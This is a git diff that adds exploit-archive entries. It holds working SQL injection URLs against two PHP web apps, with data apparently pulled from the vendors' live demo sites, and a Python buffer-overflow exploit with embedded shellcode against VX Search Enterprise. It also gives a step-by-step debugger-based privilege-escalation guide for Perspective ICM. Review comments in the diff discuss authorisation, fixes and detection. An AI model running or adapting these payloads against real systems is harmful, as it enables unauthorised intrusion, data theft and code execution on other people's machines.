diff --git a/exploits/php/webapps/43211.txt b/exploits/php/webapps/43211.txt new file mode 100644 index 000000000..180199d01 --- /dev/null +++ b/exploits/php/webapps/43211.txt @@ -0,0 +1,43 @@ +# # # # # +# Exploit Title: Techno - Portfolio Management Panel 1.0 - SQL Injection +# Dork: N/A +# Date: 02.12.2017 +# Vendor Homepage: https://codecanyon.net/user/engtechno +# Software Link: https://codecanyon.net/item/techno-portfolio-management-panel/20919551 +# Demo: http://dacy.esy.es/eng/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# http://localhost/[PATH]/single.php?id=[SQL] +# +# -14++/*!08888UNION*/(/*!08888SELECT*/0x283129,0x283229,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),0x283429,0x283529,0x283629,0x283729,(/*!08888SELECT*/+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+/*!08888FROM*/+INFORMATION_SCHEMA.TABLES+/*!08888WHERE*/+TABLE_SCHEMA=DATABASE()),0x283929,0x28313029,0x28313129,0x28313229,0x28313329)--+- +# +# Etc.. +# # # # # + + + +http://server/single.php?id=-14++/*!08888UNION*/(/*!08888SELECT*/0x283129,0x283229,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),0x283429,0x283529,0x283629,0x283729,(/*!08888SELECT*/+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+/*!08888FROM*/+INFORMATION_SCHEMA.TABLES+/*!08888WHERE*/+TABLE_SCHEMA=DATABASE()),0x283929,0x28313029,0x28313129,0x28313229,0x28313329)--+- + +u633631124_dacy@server : u633631124_dacy : 10.1.24-MariaDB + +(7)categories +feedback +messages +notes +portfolio +settings +uploads +users +wp_commentmeta +wp_comments +etc.... \ No newline at end of file diff --git a/exploits/php/webapps/43212.txt b/exploits/php/webapps/43212.txt new file mode 100644 index 000000000..841c61b17 --- /dev/null +++ b/exploits/php/webapps/43212.txt 
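Review bot: The proof of concept reproduces the result of running the injection against the vendor's public demo (`# Demo: http://dacy.esy.es/eng/`, output line `u633631124_dacy@server : u633631124_dacy : 10.1.24-MariaDB` followed by the live table list), and nothing in the header says the demo's owner authorised that test; the same applies to 43212.txt, whose PoC output is taken from `posty.in`. Neither header carries a disclosure timeline or vendor-response field, so a reader cannot tell whether the vendor was contacted before publication. The payload also indicates the root cause: a bare `-14` followed by a UNION is accepted by `single.php?id=`, which only works if the numeric `id` parameter reaches the query unbound, so the remediation for the vendor is to pass `id` as a prepared-statement parameter (or at minimum cast it to an integer) before use. That one sentence belongs under `# Description:` next to `The vulnerability allows an attacker to inject sql commands....`, which as written names the impact but not the cause or the fix.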
@@ -0,0 +1,62 @@ +# # # # # +# Exploit Title: Readymade Classifieds Script 1.0 - SQL Injection +# Dork: N/A +# Date: 02.12.2017 +# Vendor Homepage: http://www.scubez.net/ +# Software Link: http://www.posty.in/index.html +# Demo: http://www.posty.in/readymade-classifieds-demo.html +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# +# http://localhost/[PATH]/listings.php?catid=[SQL] +# +# -1++/*!08888UNION*/((/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)))--+- +# +# Parameter: catid (GET) +# Type: boolean-based blind +# Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) +# Payload: catid=-7326' OR 9205=9205# +# +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind +# Payload: catid=' AND SLEEP(5)-- tCbs +# +# 2) +# +# http://localhost/[PATH]/ads-details.php?ID=[SQL] +# +# -265++/*!08888UNION*/(/*!08888SELECT*/(1),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26))--+- +# +# Parameter: ID (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: ID=265 AND 4157=4157 +# +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind +# Payload: ID=265 AND SLEEP(5) +# +# Type: UNION query +# Title: Generic UNION query (NULL) - 26 columns +# Payload: ID=-5939 UNION ALL SELECT 
NULL,NULL,CONCAT(0x716a626271,0x664f68565771437a5444554e794f547462774e65574f43616b767945464c416d524b646f48675a67,0x71787a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ZIaY +# +# Etc.. +# # # # # + + + + +http://server/listings.php?catid=-1++/*!08888UNION*/((/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)))--+- + +http://server/ads-details.php?ID=-265++/*!08888UNION*/(/*!08888SELECT*/(1),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26))--+- \ No newline at end of file diff --git a/exploits/windows/remote/43209.py b/exploits/windows/remote/43209.py new file mode 100755 index 000000000..b75b41ffc --- /dev/null +++ b/exploits/windows/remote/43209.py 
@@ -0,0 +1,67 @@ +#!/usr/bin/python + + +print "*** VX Search Enterprise v10.2.14 Buffer Overflow (SEH) ***\n" + +# Exploit Title : VX Search Enterprise v10.2.14 Buffer Overflow (SEH) +# Discovery by : W01fier00t +# Twitter : @wolfieroot +# Discovery Date : 22/11/2017 +# Software Link : http://www.vxsearch.com/setups/vxsearchent_setup_v10.2.14.exe +# Tested Version : 10.2.14 +# Tested on OS : Windows 7 Home Edition sp1 +# You will need to enable web server for this to work. +# You will also need the Login to VX Search wepage, for this to work. + +import urllib +import urllib2 +import socket + +#Bad chars \x00\x0a\x0d +#Payload size: 351 bytes +shellcode = ( +"\xdd\xc6\xb8\x4a\xec\xd2\xea\xd9\x74\x24\xf4\x5d\x2b\xc9\xb1" +"\x52\x83\xc5\x04\x31\x45\x13\x03\x0f\xff\x30\x1f\x73\x17\x36" +"\xe0\x8b\xe8\x57\x68\x6e\xd9\x57\x0e\xfb\x4a\x68\x44\xa9\x66" +"\x03\x08\x59\xfc\x61\x85\x6e\xb5\xcc\xf3\x41\x46\x7c\xc7\xc0" +"\xc4\x7f\x14\x22\xf4\x4f\x69\x23\x31\xad\x80\x71\xea\xb9\x37" +"\x65\x9f\xf4\x8b\x0e\xd3\x19\x8c\xf3\xa4\x18\xbd\xa2\xbf\x42" +"\x1d\x45\x13\xff\x14\x5d\x70\x3a\xee\xd6\x42\xb0\xf1\x3e\x9b" +"\x39\x5d\x7f\x13\xc8\x9f\xb8\x94\x33\xea\xb0\xe6\xce\xed\x07" +"\x94\x14\x7b\x93\x3e\xde\xdb\x7f\xbe\x33\xbd\xf4\xcc\xf8\xc9" +"\x52\xd1\xff\x1e\xe9\xed\x74\xa1\x3d\x64\xce\x86\x99\x2c\x94" +"\xa7\xb8\x88\x7b\xd7\xda\x72\x23\x7d\x91\x9f\x30\x0c\xf8\xf7" +"\xf5\x3d\x02\x08\x92\x36\x71\x3a\x3d\xed\x1d\x76\xb6\x2b\xda" +"\x79\xed\x8c\x74\x84\x0e\xed\x5d\x43\x5a\xbd\xf5\x62\xe3\x56" +"\x05\x8a\x36\xf8\x55\x24\xe9\xb9\x05\x84\x59\x52\x4f\x0b\x85" +"\x42\x70\xc1\xae\xe9\x8b\x82\x10\x45\x93\x4a\xf9\x94\x93\x74" +"\x98\x11\x75\xe2\x4a\x74\x2e\x9b\xf3\xdd\xa4\x3a\xfb\xcb\xc1" +"\x7d\x77\xf8\x36\x33\x70\x75\x24\xa4\x70\xc0\x16\x63\x8e\xfe" +"\x3e\xef\x1d\x65\xbe\x66\x3e\x32\xe9\x2f\xf0\x4b\x7f\xc2\xab" +"\xe5\x9d\x1f\x2d\xcd\x25\xc4\x8e\xd0\xa4\x89\xab\xf6\xb6\x57" +"\x33\xb3\xe2\x07\x62\x6d\x5c\xee\xdc\xdf\x36\xb8\xb3\x89\xde" 
+"\x3d\xf8\x09\x98\x41\xd5\xff\x44\xf3\x80\xb9\x7b\x3c\x45\x4e" +"\x04\x20\xf5\xb1\xdf\xe0\x05\xf8\x7d\x40\x8e\xa5\x14\xd0\xd3" +"\x55\xc3\x17\xea\xd5\xe1\xe7\x09\xc5\x80\xe2\x56\x41\x79\x9f" +"\xc7\x24\x7d\x0c\xe7\x6c") + +#0x1001a136 : pop edi # pop esi # ret 0x04 | {PAGE_EXECUTE_READ} [libspp.dll] +cmdname = "\x90" *16 +cmdname += shellcode +cmdname += "A" * 157 +cmdname += "\xEB\x06" +cmdname += "B" *2 +cmdname += "\x36\xa1\x01\x10" + +print " [*] Sending payload!..." +url = 'http://127.0.0.1/add_command?sid=f3fdf2603e9ac8f518db9452fee62110' +values = {'command_name' : cmdname} +data = urllib.urlencode(values) +req = urllib2.Request(url, data) + +try: + response = urllib2.urlopen(req, timeout = 1) +except socket.timeout: + pass + +print " [*] DONE! :D\n" \ No newline at end of file diff --git a/exploits/windows/webapps/43210.txt b/exploits/windows/webapps/43210.txt new file mode 100644 index 000000000..ee7899496 --- /dev/null +++ b/exploits/windows/webapps/43210.txt 
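Review bot: The session id hard-coded in `url` (`sid=f3fdf2603e9ac8f518db9452fee62110`) belongs to the author's own logged-in VX Search web session, but the header only says a login is needed, so a reader will take it for a constant; a comment on the `url =` line such as `# sid: replace with the session id of your own authenticated VX Search web session` would close that gap. The `except socket.timeout: pass` also swallows only the timeout, so when the web server is not enabled (the precondition stated in the header) the `urllib2.URLError` from the refused connection surfaces as a bare traceback rather than a message pointing back to that precondition. The shellcode blob is documented only by size and bad characters; a one-line comment saying what it does when it runs would let someone reviewing this in a lab know what to expect. On the defensive side the request is easy to characterise: a POST to `/add_command` whose `command_name` field is roughly 530 bytes of padding plus shellcode, so a length limit on that parameter in the web server, or a rule on unusually long `command_name` values in its access log, is a practical mitigation and detection.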
@@ -0,0 +1,75 @@ +# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # ## # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # +# Exploit Title: Privilege Escalation - Perspective ICM Investigation & Case - 5.1.1.16 +# Date Reported to vendor: Jun 28, 2017 +# Date Accepted by vendor: Jun 11, 2017 +# Exploit Author: Konstantinos.alexiou@hotmail.com +# Vendor Homepage: www.resolver.com +# Version: Perspective ICM Investigation & Case - 5.1.1.16 +# Tested on: Windows 8.1 +# CVE: CVE-2017-11319 +# CVSS v2 Vector: (AV:A/AC:L/Au:S/C:C/I:C/A:P) +# CVSS v2 Score: 7.4 +# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # +According to Resolver site: CIS "investigations and case management software is an end-to-end, total solution for responding to, reporting on, +and investigating incidents" +====================================================Vulnerability description============================================================= +The CIS application permits tampering of users’ permission values which are loaded through the following methods inside the Perspective.data.dll +just after the initial authentication phase and before the graphical users’ interface is loaded: + - accessLevels() + - userEntityPrivs() + - userFieldPrivs() +The CIS thick client uses the aforementioned methods to set the users’ graphical interface, their permissions access level as well privilege access against +each GUI field which is retrieved from the database server just after the initial login phase. Due to insufficient validation methods and missing cross server +side checking mechanisms, unprivileged authenticated users are allowed to modify their access level permissions by tampering and modifying these values +thus gaining access to priveleged users actions. 
An unprivileged user is able by using a C# disassembling and debugging tool such as “dnspy” to tamper +these values and gain access on hidden and restricted privileged fields or enable hidden forms such as the “Administration” currently accessible only to the +“CIS Administrators” group. +======================================================== Proof of Concept ============================================================== + +1. Connect to the URL and click on the main button to initiate the installation of the ClickOnce CIS application. +The CIS application starts downloading various required files which are automatically saved under the following folder: +C:\Users\{Current Logged in User}\AppData\Local\Apps\2.0 + +2.When the download is finished the main executable “Perspective.exe” is initialized and loaded by the dfsvc.exe which is responsible to check if the application +is already installed and up to date. + +3. Close the application and open a disassembling and debugging tool such as dnspy. Use the menu “debugger” and choose the option “Debug an assembly”. +This will open a dialog box to choose an executable for debugging. +Navigate to the main executable “Perspective.exe” which is installed inside the following directory and press OK: +“C:\Users\{Current Logged in User}\AppData\Local\Apps\2.0\Data\{name}.WRL\{name}.AOQ\ pers..tive_f50e2c1eb6078f5b_0005.0001_c760ec4c4b1ffe6d\ +The debugger will stop at the main Entry Point of the application. + +4. Click “Continue” from the main menu of the application until the login form appears on the screen. + +5. When the login screen appears, navigate to the “DataHandle” class which is defined inside the “Prespective.data.dll” and should be already decompiled by the dnSpy. + +6. Insert breakpoints at the following functions inside the DataHandle Class: + - UserEntityPrivs + - UserFieldPrivs + - UserReportPrivs + +7. 
Login to the application with an unprivileged account and then click Continue from the main menu of the dnSpy. The debugger will stop on the first breakpoint at line +of the function UserEntityPrivs(). The “foreach” loop used inside these lines calls the UserEntityPrivs() function and sets the users’ allowed permissions against visible +screens and forms. Click on the Locals field at the bottom menu of the dnSpy and navigate to the entity “useEntityPrivs()” section. +It should be mentioned that the “Administration” menu is restricted only for members belonging to “CIS Administrator” role while the user ITSECAS1 has no access on it. + +8. To enable just the administration menu for an unprivileged user just press Continue until the EntityID “Administration” appears in the Locals screen of the dnSpy and +change the following values to true: + - AllowAdd + - AllowDelete + - AllowEdit + - AllowExecute + - AllowFullControl + - AllowMange + - AllowReadOnly + - AllowShare + - Visible + +9. Delete the breakpoints and press Continue until the main screen of the thick client appears on the screen. +While the user is assigned as “Global Head” the administration menu accessible only to the admin users appears on his screen. +This modification provide access rights to change the minimum Password length to 6 characters +Additionally, using the aforementioned technique it is possible to enable additional restricted and none visible screens for any unauthorized user. +It should be also be mentioned that using the same technique it was possible to change the users’ report privileges inside the last “foreach” loop. + +10. Finally, and just after the UserReportPrivs foreach loop finishes, we can modify the users’ global membership permissions before they are applied to his interface. +Finally it should be mentioned that it is possible to access any submenu on the administration menu and modify values with only exception to create a new user. \ No newline at end of file 
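Review bot: The header dates contradict each other: `# Date Reported to vendor: Jun 28, 2017` is later than `# Date Accepted by vendor: Jun 11, 2017`, so one of the two is wrong and the disclosure timeline cannot be reconstructed from the advisory; the correct pair should be confirmed with the submitter. Step 5 refers to `Prespective.data.dll` while the description names `Perspective.data.dll`, and `AllowMange` in step 8 reads like a typo for `AllowManage` unless that is the literal property name. The description does give the root cause — the access-level values are fetched once after login and enforced only inside the thick client — but the advisory never states the remediation that follows from it, and a closing line noting that every privileged operation must be re-authorised on the server against the user's stored role rather than trusting flags held in the client process would make the write-up useful to the vendor and to anyone assessing similar ClickOnce applications.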
diff --git a/files_exploits.csv b/files_exploits.csv
index 58c0fdf6b..480d2b5be 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -10786,7 +10786,7 @@ id,file,description,date,author,type,platform,port
 11059,exploits/windows/remote/11059.html,"JcomBand toolbar on IE - ActiveX Buffer Overflow",2010-01-07,"germaya_x & D3V!L FUCKER",remote,windows,
 11138,exploits/windows/remote/11138.c,"Apple iTunes 8.1.x - 'daap' Remote Buffer Overflow",2010-01-14,Simo36,remote,windows,
 11151,exploits/windows/remote/11151.html,"Microsoft Internet Explorer - 'wshom.ocx' ActiveX Control Remote Code Execution",2010-01-16,"germaya_x & D3V!L FUCKER",remote,windows,
-11167,exploits/windows/remote/11167.py,"Microsoft Internet Explorer 6 - Aurora",2010-01-17,"Ahmed Obied",remote,windows,
+11167,exploits/windows/remote/11167.py,"Microsoft Internet Explorer 6 - 'Aurora' Memory Corruption (MS10-002)",2010-01-17,"Ahmed Obied",remote,windows,
 11172,exploits/windows/remote/11172.html,"Adobe GetPlus get_atlcom 1.6.2.48 - ActiveX Remote Execution (PoC)",2010-01-17,superli,remote,windows,
 11173,exploits/windows/remote/11173.txt,"Trend Micro Web-Deployment - ActiveX Remote Execution (PoC)",2010-01-17,superli,remote,windows,
 11179,exploits/windows/remote/11179.rb,"EFS Software Easy Chat Server 2.2 - Remote Buffer Overflow",2010-01-18,"John Babio",remote,windows,
@@ -15996,6 +15996,7 @@ id,file,description,date,author,type,platform,port
 43195,exploits/windows/remote/43195.py,"HP iMC Plat 7.2 - Remote Code Execution",2017-11-28,"Chris Lyne",remote,windows,
 43193,exploits/unix/remote/43193.rb,"pfSense - Authenticated Group Member Remote Command Execution (Metasploit)",2017-11-29,Metasploit,remote,unix,443
 43198,exploits/windows/remote/43198.py,"HP iMC Plat 7.2 - Remote Code Execution (2)",2017-11-29,"Chris Lyne",remote,windows,
+43209,exploits/windows/remote/43209.py,"VX Search 10.2.14 - 'command_name' Buffer Overflow",2017-12-05,W01fier00t,remote,windows,80
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -38241,3 +38242,6 @@ id,file,description,date,author,type,platform,port
 43203,exploits/php/webapps/43203.txt,"Jobs2Careers / Coroflot Clone - SQL Injection",2017-11-30,8bitsec,webapps,php,
 43205,exploits/multiple/webapps/43205.txt,"MistServer 2.12 - Cross-Site Scripting",2017-12-01,hyp3rlinx,webapps,multiple,
 43206,exploits/php/webapps/43206.txt,"Artica Web Proxy 3.06 - Remote Code Execution",2017-12-01,hyp3rlinx,webapps,php,
+43210,exploits/windows/webapps/43210.txt,"Perspective ICM Investigation & Case 5.1.1.16 - Privilege Escalation",2017-12-05,"Konstantinos Alexiou",webapps,windows,
+43211,exploits/php/webapps/43211.txt,"Techno Portfolio Management Panel - 'id' SQL Injection",2017-12-05,"Ihsan Sencan",webapps,php,
+43212,exploits/php/webapps/43212.txt,"Readymade Classifieds Script 1.0 - SQL Injection",2017-12-05,"Ihsan Sencan",webapps,php,